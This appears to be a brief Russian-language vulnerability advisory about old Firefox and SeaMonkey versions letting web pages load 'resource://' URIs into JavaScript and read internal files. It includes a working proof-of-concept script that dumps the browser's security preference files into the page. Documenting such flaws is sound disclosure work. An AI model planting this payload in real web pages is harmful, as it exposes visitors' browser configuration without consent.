Хакер #305. Многошаговые SQL-инъекции
Программа:
Mozilla Firefox 1.x
Mozilla Firefox 2.0.x
Mozilla SeaMonkey 1.0.x
Mozilla SeaMonkey 1.1.x
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе. Уязвимость существует из-за того, что браузер не правильно запрещает загрузку "resource://" URI в среду JavaScript. Используя эту уязвимость совместно с возможностью обхода директорий, атакующий может получить несанкционированный доступ к конфиденциальной информации, например, настройкам безопасности браузера.
Пример:
<script>
function pref(param,value){
document.write ("<b>"+param+"</b> = "+value+"")
};
</script>
<script src="resource://gre/greprefs/security-prefs.js"></script>
<script src="resource://gre/greprefs/all.js"></script>